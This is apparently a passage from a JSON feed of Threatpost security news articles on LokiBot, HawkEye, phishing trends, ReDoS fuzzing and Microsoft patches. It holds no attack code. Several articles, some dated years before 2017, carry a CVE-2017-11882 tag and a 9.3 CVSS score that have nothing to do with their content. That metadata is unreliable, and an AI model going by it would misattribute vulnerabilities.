That\u2019s why we\u2019re taking a planned approach to this issue and providing customers with advance notice.\u201d\n\nMicrosoft also is providing a FixIt tool that allows users to disable SSLv3 support in any supported version of IE.\n", "cvss3": {}, "published": "2014-10-29T14:56:06", "type": "threatpost", "title": "Microsoft Plans to Disable SSLv3 in IE, All Online Services", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-05T15:10:14", "id": "THREATPOST:05A74488EF15AE2BEA20C34AC753FB10", "href": "https://threatpost.com/microsoft-plans-to-disable-sslv3-in-ie-all-online-services/109087/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-09T22:13:17", "description": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that the LokiBot info-stealing trojan is seeing a surge across the enterprise landscape.\n\nThe uptick started in July, according to the agency, and activity has remained \u201cpersistent\u201d ever since.\n\nLokiBot targets Windows and [Android endpoints](<https://threatpost.com/lokibot-redux-common-android-apps/157458/>), and spreads mainly through email (but also via malicious websites, texts and messaging). It typically goes after credentials (usernames, passwords, cryptocurrency wallets and more), as well as personal information. The malware steals the data through the use of a keylogger to monitor browser and desktop activity, CISA explained.\n\n\u201cLokiBot has stolen credentials from multiple applications and data sources, including Windows operating system credentials, email clients, File Transfer Protocol and Secure File Transfer Protocol clients,\u201d according to the alert, [issued Tuesday](<https://us-cert.cisa.gov/ncas/alerts/aa20-266a>). 
\u201cLokiBot has [also] demonstrated the ability to steal credentials from\u2026Safari and Chromium and Mozilla Firefox-based web browsers.\u201d\n\nLokiBot can also act as a backdoor into infected systems to pave the way for additional payloads.\n\nLike its Viking namesake, LokiBot is a bit of a trickster, and disguises itself in diverse attachment types, sometimes using steganography for maximum obfuscation. For instance, the malware has been disguised as a .ZIP attachment [hidden inside a .PNG file](<https://threatpost.com/lokibot-trojan-spotted-hitching-a-ride-inside-png-files/143491/>) that can slip past some email security gateways, or [hidden as an ISO disk image](<https://threatpost.com/malspam-emails-blanket-lokibot-nanocore-malware-with-iso-files/145991/>) file attachment.\n\nIt also uses a number of application guises. \u201cSince LokiBot was first reported in 2015, cyber actors have used it across a range of targeted applications,\u201d CISA noted. For instance, in February, it was seen [impersonating a launcher](<https://www.trendmicro.com/en_us/research/20/b/lokibot-impersonates-popular-game-launcher-and-drops-compiled-c-code-file.html>) for the popular Fortnite video game.\n\nOther tactics include the use of zipped files along with malicious macros in Microsoft Word and Excel, and leveraging the exploit [CVE-2017-11882](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>) (an issue in Office Equation Editor that allows attackers to automatically run malicious code without requiring user interaction). 
The latter is done via malicious RTF files, researchers have observed.\n\nTo boot, researchers [have seen the malware being sold](<https://threatpost.com/u-s-manufacturer-most-recent-target-of-lokibot-malspam-campaign/148153/>) as a commodity in underground markets, with versions selling for as little as $300.\n\nWith all of these factors taken together, LokiBot represents \u201can attractive tool for a broad range of cyber actors across a wide variety of data compromise use cases,\u201d according to CISA.\n\nSaryu Nayyar, CEO at Gurucul, noted that the advisory is another indication of how malware authors have turned their malicious activities into a scalable business model.\n\n\u201cThe fact that LokiBot has been around for over four years and has gained in capability over time is a reflection of how much malicious actors have advanced the state of their art, leveraging the same development models we use in the commercial space,\u201d she said, via email.\n\nTo protect themselves, CISA said that companies should keep patches up to date, disable file- and printer-sharing services if not necessary, enforce multi-factor authentication and strong passwords, enable personal firewalls and scanning of downloads, and implement user education on how to exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known.\n", "cvss3": {}, "published": "2020-09-23T15:27:18", "type": "threatpost", "title": "CISA: LokiBot Stealer Storms Into a Resurgence", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2020-09-23T15:27:18", "id": "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "href": "https://threatpost.com/cisa-lokibot-stealer-resurgence/159495/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:06:49", "description": "Microsoft has released a new fuzzing tool designed 
specifically to find mistakes in regular expressions in application code that could be vulnerable to attack. The [SDL Regex Fuzzer](<https://www.microsoft.com/downloads/en/details.aspx?FamilyID=8737519c-52d3-4291-9034-caa71855451f>) identifies problematic lines that might cause an application to be susceptible to attacks that consume huge amounts of resources and cause denial-of-service conditions.\n\nThe new fuzzer is meant to be used specifically to find vulnerable regular expressions in application code that could lead to a special kind of attack known as a ReDoS. Microsoft officials say that as more and more applications are moved to cloud providers, attackers will begin to focus their attention on those applications in new and profitable ways.\n\n\u201cI\u2019ve [predicted](<http://msdn.microsoft.com/en-us/magazine/ff646973.aspx>) before that as cloud computing gains wider adoption, we\u2019ll start to see a significant increase in denial of service (DoS) attacks against those services. When you\u2019re paying for the processor time, bandwidth and storage that your applications use, attacks that explicitly target and consume those resources can get very expensive very quickly, not to mention the costs of downtime for legitimate users. Attackers will shift from pursuing elusive privilege elevation vulnerabilities to simply blackmailing SaaS providers: pay me $10,000 or I\u2019ll make your app consume $20,000 worth of server resources,\u201d Microsoft\u2019s Bryan Sullivan wrote in a blog post explaining the SDL Regex Fuzzer.\n\nAs Sullivan explains in an [article](<http://msdn.microsoft.com/en-us/magazine/ff646973.aspx>) on the problem from earlier this year, a small change to an input string can cause major problems for a regular expression engine.\n\n\u201cHere is where things get \u2018interesting\u2019 (as in horribly dangerous). 
Instead of just checking that the next character after 5 is not the end of the string, the engine treats the next character, 6, as a new capture group and starts rechecking from there. Once that route fails, it backs up to 1234 and then tries 56 as a separate capture group, then 5 and 6 each as separate capture groups. The end result is that the engine actually ends up evaluating 32 different paths,\u201d he wrote.\n\n\u201cIf we now add just one more numeric character to the evaluation string, the engine will have to evaluate 64 paths\u2014twice as many\u2014to determine that it\u2019s not a match. This is an exponential increase in the amount of work being performed by the regex engine. An attacker could provide a relatively short input string\u201430 characters or so\u2014and force the engine to process hundreds of millions of paths, tying it up for hours or days.\u201d\n\nThe new fuzzer is free to download.\n", "cvss3": {}, "published": "2010-10-13T18:08:57", "type": "threatpost", "title": "Microsoft Releases New Regex Fuzzer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:20:31", "id": "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "href": "https://threatpost.com/microsoft-releases-new-regex-fuzzer-101310/74571/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:26", "description": "When one Pennsylvanian man couldn\u2019t foot his bills, he opted to steal the identity of someone that could \u2013 one of the world\u2019s richest men, Microsoft co-founder and billionaire Paul Allen.\n\nAn AWOL soldier from Pittsburgh swiped Allen\u2019s Citibank credit card account information earlier this year to make a $658.81 payment on a loan from the Armed Forces Bank, according to an [Associated Press 
report](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n\nA criminal complaint unsealed Monday claims that after acquiring Allen\u2019s account information, the soldier, Brandon Lee Prince, 28, changed the address of the card to his own and reported it missing in an attempt to have a new card sent to his Pittsburgh address. The card was delivered and soon after, the fraudulent charges began to pile up.\n\nOn top of the loan payment, it was also used at a Pittsburgh GameStop ($278.18), a Family Dollar ($1) and at a Western Union, where Price tried to process a $15,000 transaction.\n\nThe bank noticed the illicit charges and promptly notified the FBI who had an agent follow Price around the neighborhood. After seeing him wearing the same clothes he wore in surveillance footage taken at the GameStop and Family Dollar stores, Price was arrested on March 2.\n\nAccording to authorities, Price had actually been away from the army since June 2010 and wanted as a deserter.\n\nAllen, who helped found Microsoft with Bill Gates in 1975, also owns the NBA\u2019s Portland Trailblazers and the NFL\u2019s Seattle Seahawks and has a net worth of about $14.2 billion, [according to Forbes](<http://www.forbes.com/profile/paul-allen/>) \u2013 enough to rank at number 48 on the [publication\u2019s list](<http://www.forbes.com/billionaires/#p_1_s_a0_All%20industries_All%20countries_All%20states_>) of the richest people on the planet.\n\nFor more on this, check out the AP report via the [Washington Post](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n", "cvss3": {}, "published": "2012-03-29T15:56:05", "type": "threatpost", "title": "Fortune Favors the Bold? 
Man Steals Microsoft Founder's Identity, Credit Card", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:32", "id": "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "href": "https://threatpost.com/fortune-favors-bold-man-steals-microsoft-founder-s-identity-credit-card-032912/76380/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-08T12:00:06", "description": "The HawkEye malware kit and information-stealer has been spotted in a newfound slew of campaigns after a recent ownership change.\n\nWhile the keylogger has been in continuous development since 2013, in December a thread on a hacking site noted an ownership change, after which posts on hacking forums began to appear, selling new versions of the kit. \u201cHawkEye Reborn v9\u201d sports new anti-detection features and other changes, researchers said.\n\n\u201cRecent changes in both the ownership and development efforts of the HawkEye Reborn keylogger/stealer demonstrate that this is a threat that will continue to experience ongoing development and improvement moving forward,\u201d said Edmund Brumaghin and Holger Unterbrink, researchers with Cisco Talos, in a [Monday analysis](<https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html>). \u201cHawkEye has been active across the threat landscape for a long time, and will likely continue to be leveraged in the future as long as the developer of this kit can monetize their efforts.\u201d\n\nThis latest version of HawkEye is sold through a licensing model (meaning that purchasers gain access to the software and future updates based on a varying tiered pricing model), and is being marketed on hacking sites as an \u201cadvanced monitoring solution.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/16091412/hawkeye-3.png>)\n\n\u201cThe current developer of the 
HawkEye Reborn keylogger/stealer is continuously adding support for different applications and software platforms to facilitate the theft of sensitive information and account credentials,\u201d researchers told Threatpost. \u201cThe malware has recently undergone changes to the way in which it is obfuscated and additional anti-analysis techniques have been implemented as well.\u201d\n\nHawkEye Reborn v9 also now features a terms-of-service agreement: While the seller says that the keylogger should only be used on systems with permission, the agreement also explicitly forbids scanning of HawkEye Reborn v9 executables using antivirus software.\n\nIn a further attempt \u201cto minimize the likelihood that anti-malware solutions will detect HawkEye Reborn binaries,\u201d researchers said that the keylogger also now comes with several anti-analysis features, such as an anti-debugging thread process and the ability to disable certain antivirus-related programs.\n\nIn tandem with the ownership change of HawkEye, researchers observed a slew of campaigns from late 2018 into 2019 that involve this most recent version of the malware.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/16091515/hawkeye-2.jpg>)\n\nThe malicious email campaigns include messages that appear to be requesting invoices, bills of materials, order confirmations and other things related to normal corporate functions. However, the emails actually arrive with malicious Microsoft Excel attachments (which exploit an arbitrary code execution bug in Microsoft Office, CVE-2017-11882), as well as RTF (Rich Text Format) or Doc files.\n\nOnce a victim clicks on the attachment, the email-senders have intentionally made the contents of the documents look blurry \u2014 and the user is prompted to enable editing to have a clearer view of the contents. 
After they do that, the injection process begins, with the HawkEye keylogger being downloaded.\n\nThe malware then snatches up sensitive information, such as the system information, passwords from common web browsers, clipboard contents, desktop screenshots, webcam pictures and account credentials.\n\nThreatpost has reached out to Cisco Talos researchers for further details about the campaigns, including how many there have been, and what victims have been targeted.\n\nMoving forward, researchers warn that HawkEye will continue to evolve. But more significantly, the malware kit represents yet another offering that reduces the barrier for entry for bad actors, who may not necessarily have the programming skills to carry out sophisticated hacks.\n\n\u201cIn many cases, the adversaries leveraging these tools do not need to possess programming skills or in-depth computer science expertise, as they are now being provided as commercial offerings across the cybercriminal underground,\u201d researchers said.\n", "cvss3": {}, "published": "2019-04-16T14:34:54", "type": "threatpost", "title": "Malspam Campaigns Distribute HawkEye Keylogger, Post Ownership Change", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-04-16T14:34:54", "id": "THREATPOST:A29172A6F4C253F7A464F05CCE4E3ABB", "href": "https://threatpost.com/hawkeye-keylogger-malspam-campaigns/143807/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T07:10:35", "description": "Phishing attempts more than doubled in 2018, as bad actors sought to trick victims into handing over their credentials. They used both old tricks \u2013 such as scams tied to current events \u2013 as well as other stealthy, fresher tactics.\n\nResearchers with Kaspersky Lab said in a [Tuesday report](<https://securelist.com/spam-and-phishing-in-2018/89701/>) that during the course of 2018, they detected phishing redirection attempts 482.5 million times \u2013 up from the 246.2 million attempts detected in 2017. In total, 18.32 percent of users were attacked, researchers said.\n\n\u201cWe have seen a steady increase in phishing attacks on cryptocurrency-related resources, and expect new scams to appear in 2019,\u201d according to the report, by Maria Vergelis, Tatyana Shcherbakova and Tatyana Sidorina with Kaspersky Lab. 
\u201cDespite the fall in value and the lean times for the cryptocurrency market as a whole, phishers and spammers will try to squeeze everything they can out of this.\u201d\n\n## Current Events: A Go-To Phishing Hook\n\nBad actors continued to rely on an age-old trick in 2018 for phishing attacks: Using newsworthy events, such as new smartphone launches, [sales seasons](<https://threatpost.com/threatlist-gift-card-themed-bec-holiday-scams-spike/139716/>), [tax deadlines](<https://threatpost.com/fbi-warns-of-spike-in-w-2-phishing-campaigns/130057/>), and the EU General Data Protection Regulation (GDPR) to hook the victim.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12151936/190311-spam-report-2018-1-e1552418397221.png>)\n\nPhishing emails purporting to be about GDPR, for instance, boomed [in the first few months](<https://threatpost.com/gdpr-phishing-scam-targets-apple-accounts-financial-data/131915/>) of 2018, because during those months there was an upturn in legitimate GDPR mailings warning users of the transition to the new policies, which require stringent processes to store and process personal data of European citizens.\n\nAttackers unsurprisingly took advantage of this with their own GDPR-related emails: \u201cIt was generally B2B spam \u2014 mostly invitations to paid seminars, webinars, and workshops promising to explain the ins and outs of the new regulation and its ramifications for business,\u201d said researchers.\n\nOther top events, such as the 2018 [FIFA World Cup](<https://threatpost.com/world-cup-vacation-scams-lead-in-phishing-trips-this-summer/132543/>) and the launch of the new iPhone sparked phishing attempts, including emails leading to fake FIFA partner websites for the former, and spam messages purporting to sell accessories and replica gadgets for the latter.\n\n## Cryptocurrency Targets\n\nDespite the cryptocurrency market\u2019s [struggle in 
2018](<https://www.cnbc.com/2018/10/12/bitcoin-price-cryptocurrency-market-drops-as-xrp-ethereum-plunge.html>), bad actors\u2019 interest in cryptocurrencies appears far from waning. In fact, scammers utilized a number of methods to capitalize on victims\u2019 interests in the cryptocurrency market, such as posing as a cryptocurrency exchange or fake Initial Coin Offering (ICO) bent on convincing victims to transfer money to cryptocurrency wallets.\n\n\u201cIn 2018, our Anti-Phishing system prevented 410,786 attempts to redirect users to phishing sites imitating popular cryptocurrency wallets, exchanges and platforms,\u201d researchers said. \u201cFraudsters are actively creating fake login pages for cryptocurrency services in the hope of getting user credentials.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12152522/190311-spam-report-2018-7.png>)\n\nWhen it came to ICOs, scammers extended invitations to victims for investing in various ICOs via email and social-media posts.\n\nOne such scam targeted a cryptocurrency called buzcoin; the scammers got ahold of the project mailing list and sent fake presale invitations to subscribers before the ICO began \u2013 eventually making away with $15,000, according to Kaspersky Lab.\n\nThere were also sextortion scams that coerced victims to send cryptocurrency in exchange for keeping quiet about their private online activities, with one campaign in July noted for using victims\u2019 [legitimate password](<https://threatpost.com/sextortionists-shift-scare-tactics-to-include-legit-passwords/133960/>) in the email as a scare tactic; and another one in December hit victims with [ransomware](<https://threatpost.com/sextortion-emails-force-payment-via-gandcrab-ransomware/139753/>).\n\nResearchers said they don\u2019t expect attackers\u2019 interests in cryptocurrency to die down any time soon: \u201cIn 2019, spammers will continue to exploit the cryptocurrency 
topic,\u201d they said. \u201cWe expect to see more fraudulent mailings aimed at both extracting cryptocurrency and gaining access to personal accounts with various cryptocurrency services.\u201d\n\n## Other Tricks\n\nIn 2018, the number of malicious messages in spam was 1.2 times less than in 2017, according to researchers. Of those malicious messages, the most widely distributed malicious objects in email ([Exploit.Win32, CVE-2017-11882](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>)) exploited a patched Microsoft vulnerability that allowed the attacker to perform arbitrary code execution.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12152819/malware-phishing.png>)\n\nDespite this downturn in malicious emails, scammers appear to be looking to other sneaky tactics to avoid detection and still make off with victims\u2019 credentials \u2014 in particular using non-typical formats for spam like ISO, IQY, PIF and PUB attachments.\n\n\u201c2018 saw a continuation of the trend for attention to detail in email presentation,\u201d researchers said. \u201cCybercriminals imitated actual business correspondence using the companies\u2019 real details, including signatures and logos.\u201d\n\nIn addition, bad actors appeared to transition to new channels of content distribution beyond email \u2013 including social media sites, services like [Spotify](<https://threatpost.com/spotify-phishers-hijack-music-fans-accounts/139329/>), or even [Google Translate](<https://threatpost.com/clever-phishing-attack-enlists-google-translate-to-spoof-facebook-login-page/141571/>).\n\n\u201cCybercriminals in 2018 used new methods of communication with their \u2018audience,\u2019 including instant messengers and social networks, releasing wave after wave of self-propagating malicious messages,\u201d said researchers. 
\u201cHand-in-hand with this, as illustrated by [an] attack on universities, fraudsters are seeking not only new channels, but new targets as well.\u201d\n", "cvss3": {}, "published": "2019-03-12T20:48:20", "type": "threatpost", "title": "ThreatList: Phishing Attacks Doubled in 2018", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-03-12T20:48:20", "id": "THREATPOST:0A40F95A480060B254A1AA6FCF9504B2", "href": "https://threatpost.com/threatlist-phishing-attacks-doubled-in-2018/142732/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:34", "description": "Fearing destructive attacks precipitated by the availability of the nation-state exploits in the wild that spawned the WannaCry outbreak, Microsoft today announced that its Patch Tuesday updates would include fixes for older versions of Windows, including XP.\n\nThe move is unusual and mimics a similar one made in the hours following WannaCry\u2019s appearance on May 12 when hundreds of thousands of Windows machines worldwide were compromised and their data encrypted.\n\nMicrosoft had pleaded with Windows admins to apply MS17-010, a security bulletin released in March, one month before the ShadowBrokers leaked a cadre of weaponized Windows exploits, but many did not take heed. 
Microsoft had to scramble as WannaCry made its way around the globe to release an [emergency update](<https://threatpost.com/microsoft-releases-xp-patch-for-wannacry-ransomware/125671/>) late in the evening of May 12 for Windows XP and Windows 8 machines, easing any potential pain for unsupported versions of Windows; EternalBlue, the NSA exploit in question, targeted SMB running on Windows XP and Windows 7 computers.\n\n\u201cDue to the elevated risk for destructive cyber attacks at this time, we made the decision to take this action because applying these updates provides further protection against potential attacks with characteristics similar to WannaCrypt,\u201d said Adrienne Hall, general manager of Microsoft\u2019s Cyber Defense Operations Center.\n\n\u201cIn reviewing the updates for this month, some vulnerabilities were identified that pose elevated risk of cyber attacks by government organizations, sometimes referred to as nation-state actors or other copycat organizations,\u201d Hall said. \u201cTo address this risk, today we are providing additional security updates along with our regular Update Tuesday service. These security updates are being made available to _all_ customers, including those using older versions of Windows.\u201d\n\nMicrosoft said that customers with automatic updates enabled are protected and would not have to take additional action to receive these updates. Microsoft said this is a rare decision and encouraged admins to apply the critical updates.\n\n\u201cOur decision today to release these security updates for platforms not in extended support should not be viewed as a departure from our standard servicing policies,\u201d said Eric Doerr, general manager of the Microsoft Security Response Center. 
\u201cBased on an assessment of the current threat landscape by our security engineers, we made the decision to make updates available more broadly.\u201d\n\nSince WannaCry, security experts have been warning Windows admins about the ferocity of the EternalBlue exploit and that it could be loaded with [any sort of payload](<https://threatpost.com/next-nsa-exploit-payload-could-be-much-worse-than-wannacry/125743/>), including wiper malware, banking Trojans, or more ransomware. Attackers have already on two occasions used it to spread cryptocurrency mining utilities.\n\nIt\u2019s unknown whether Microsoft was given any advance warning of another upcoming leak or if there are rumblings of another WannaCry-style attack. The ShadowBrokers promised monthly leaks of anything from Windows 10 exploits to mobile attacks to stolen nuclear and missile data in a new subscription service it promised to start next month.\n\nMicrosoft also maintained that organizations should long ago have moved away from older, unsupported platforms such as XP. Windows 10, for example, contains many new mitigations that prevent exploits such as EternalBlue from successfully compromising computers. 
Opponents of today\u2019s move\u2014and of the May 12 emergency update\u2014contend that these concessions on Microsoft\u2019s part to provide these types of updates will allow organizations to rationalize staying on unsupported versions of Windows.\n", "cvss3": {}, "published": "2017-06-13T15:34:53", "type": "threatpost", "title": "Risk of 'Destructive Cyber Attacks' Prompts Microsoft to Update XP Again", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-06-13T19:35:24", "id": "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "href": "https://threatpost.com/risk-of-destructive-cyber-attacks-prompts-microsoft-to-update-xp-again/126235/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "description": "Scott Charney, the head of Microsoft\u2019s Trustworthy Computing efforts, said that he was the one who decided it was time to [move the TwC group in a new direction](<https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and integrate the security functions more deeply into the company as a whole.\n\n\u201cI was the architect of these changes. This is not about the company\u2019s loss of focus or diminution of commitment. Rather, in my view, these changes are necessary if we are to advance the state of trust in computing,\u201d Charney, the corporate vice president of Trustworthy Computing at Microsoft, wrote in a blog post.\n\nThe Trustworthy Computing team was an outgrowth of the effort that Microsoft started in 2002 to build more secure software. Modest at first, the TwC group eventually grew into a large team of engineers, developers and executives and became one of the more influential groups in the company. 
Charney, a former Department of Justice lawyer who joined Microsoft just as the security push was getting off the ground in 2002, said that the move to disperse the TwC team into different groups and change the reporting structure would help the company react more quickly and be more efficient with security related decisions.\n\n\u201cBy consolidating work within the company, as well as altering some reporting structures, Microsoft will be able to make a number of trust-related decisions more quickly and execute plans with greater speed, whether the objective is to get innovations into the hands of our customers, improve our engineering systems, ensure compliance with legal or corporate policies, or engage with regulators around the world,\u201d Charney wrote in the [post](<http://blogs.microsoft.com/cybertrust/2014/09/22/looking-forward-trustworthy-computing/>).\n\nOne of the key functions of the TwC team over the years has been the development and implementation of the Security Development Lifecycle, the comprehensive development, engineering and deployment program that\u2019s meant to build security into the company\u2019s products from the beginning. Charney said that the SDL will remain the responsibility of the part of the TwC group that\u2019s moving to the Cloud and Enterprise Division.\n\n\u201cI will continue to lead the Trustworthy Computing team in our new home as part of the Cloud and Enterprise Division. Significantly, Trustworthy Computing will maintain our company-wide responsibility for centrally driven programs such as the Security Development Lifecycle (SDL) and Online Security Assurance (OSA). 
But this change will also allow us to embed ourselves more fully in the engineering division most responsible for the future of cloud and security, while increasing the impact of our critical work on privacy issues by integrating those functions directly into the appropriate engineering and legal policy organizations,\u201d Charney said.\n\nThe change to the TwC group became public last week as the company was in the process of laying off 2,100 employees as part of a series of internal changes.\n", "cvss3": {}, "published": "2014-09-23T08:53:50", "type": "threatpost", "title": "Charney on Trustworthy Computing: 'I Was the Architect of These Changes'", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-25T18:08:18", "id": "THREATPOST:04738138B50414CEACDB62EFA6D61789", "href": "https://threatpost.com/charney-on-trustworthy-computing-i-was-the-architect-of-these-changes/108455/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:11", "description": "The [Operation SnowMan espionage campaign](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), which targeted military intelligence earlier this year via an Internet Explorer zero day, exposed a weak spot in Microsoft\u2019s vulnerability management efforts. What was unique about the SnowMan operation is that it included a check as to whether the compromised computer was running [Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET)](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>), and if so, the attack would not execute.\n\nAs it turns out, attackers were taking advantage of an information disclosure bug that revealed whether EMET and other antimalware protections were active. 
Today, Microsoft took steps to close that gap in its latest cumulative update for IE.\n\nThe critical patch is one of four released today by Microsoft as part of its monthly [Patch Tuesday security bulletins](<https://technet.microsoft.com/library/security/ms14-sep>). The IE update patches 37 vulnerabilities, including the publicly known disclosure bug. The three remaining bulletins for .NET, Windows Task Scheduler, and Microsoft Lync were rated important by Microsoft and likely don\u2019t result in remote code execution.\n\nEMET is a free toolkit provided by Microsoft that midmarket and enterprise IT shops can deploy as a temporary stopgap for a zero-day vulnerability being exploited in the wild. The toolkit provides a host of exploit mitigations that protect against common memory corruption vulnerabilities. The vulnerability patched in IE allows resources loaded into memory to be queried, Microsoft said, giving attackers a heads-up as to what protections are running on a machine.\n\nThe IE patch, [MS14-052](<https://technet.microsoft.com/library/security/MS14-052>), is the highest priority bulletin for IT shops this month, experts said.\n\n\u201cThis patch is Microsoft\u2019s attempt to limit the capability of exploit kits that have been identified as using an information disclosure technique to determine if particular security software were installed,\u201d said Craig Young, a security researcher with Tripwire. \u201cThe flaw allows a malicious website to determine if a software package is installed by querying the availability of a DLL used by that software. 
Information regarding active security products on a target is very useful for an attacker; it allows them to avoid raising alarms by sending detectable payloads.\u201d\n\nThe update also patches vulnerabilities in the browser going back to IE6 running on Windows Server through current versions.\n\nThe next bulletin worth watching, experts said, is [MS14-054](<https://technet.microsoft.com/library/security/MS14-054>), a privilege escalation vulnerability in Task Scheduler. To exploit the bug, an attacker would need valid credentials and local access to an affected system.\n\nThe vulnerability affects Windows 8, Windows 8.1, Windows RT and Windows RT 8.1, as well as Windows Server 2012 and Windows Server 2012 R2.\n\n\u201cMS14-054 should also be high on IT admins\u2019 patch list as Microsoft expects to see reliable task scheduler exploits developed within a month,\u201d Young said. \u201cSuccessful exploitation of this vulnerability would allow any user to take complete control of the affected system.\u201d\n\nMicrosoft also patched a denial-of-service vulnerability in its .NET framework. 
[MS14-053](<https://technet.microsoft.com/library/security/MS14-053>) affects most versions of .NET, and also affects ASP.NET installations if it\u2019s enabled on IIS.\n\n\u201cIf left unpatched, remote unauthenticated attackers can send HTTP/HTTPS requests to cause resource exhaustion which will ultimately lead to a denial-of-service condition on the ASP.NET web server,\u201d said Amol Sarwate, director of vulnerability labs at Qualys.\n\nThe final bulletin, [MS14-055](<https://technet.microsoft.com/library/security/MS14-055>), patches three denial-of-service vulnerabilities in Microsoft\u2019s messaging server, Lync.\n\n\u201cThe security update addresses the vulnerabilities by correcting the way Lync Server sanitizes user input and by correcting the way Lync Server handles exceptions and null dereferences,\u201d Microsoft said in its advisory.\n\nMicrosoft also updated three security advisories today:\n\n * [Advisory 2871997](<https://technet.microsoft.com/library/security/2871997.aspx>) updates credential protection and domain authentication controls for Windows 7 and Windows Server 2008 R2. The update ensures credentials are cleaned up immediately rather than when a new Kerberos TGT ticket has been obtained.\n * [Advisory 2905247](<https://technet.microsoft.com/library/security/2905247.aspx>) is an update for Microsoft ASP.NET that patches a privilege elevation vulnerability in ASP.NET view state; the update was first made available last December. As of today\u2019s update, the security update is available via Microsoft Update in addition to the Download-Center-only option provided in December.\n * [Advisory 2755801](<https://technet.microsoft.com/en-us/library/security/2755801.aspx>) is an update for Adobe Flash Player in Internet Explorer versions running on Windows 8 and Windows 8.1. 
Today\u2019s update is for IE 10 on Windows 8, Windows Server 2012 and Windows RT, and IE 11 on Windows 8.1, Windows Server 2012 R2 and Windows RT 8.1.\n", "cvss3": {}, "published": "2014-09-09T14:40:33", "type": "threatpost", "title": "September 2014 Microsoft Patch Tuesday security bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-09T18:40:33", "id": "THREATPOST:D4C8CD7D146990740B8339D88A3FDB84", "href": "https://threatpost.com/emet-av-disclosure-leak-plugged-in-ie/108175/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:13", "description": "Microsoft today announced a relatively light load of patches will be delivered on [Patch Tuesday](<https://technet.microsoft.com/library/security/ms14-sep>) next week, along with some numbers that demonstrate public vulnerability disclosures continue to rise.\n\nFour security bulletins, one rated critical, are scheduled to be released next Tuesday. In what\u2019s becoming customary for Patch Tuesday, administrators can expect another cumulative patch roll-up for Internet Explorer addressing a number of remote code execution vulnerabilities in the browser.\n\nThe three remaining bulletins, all rated important by Microsoft, include a privilege-escalation bug in Windows 8 and 8.1 as well as Windows Server 2012 and RT. 
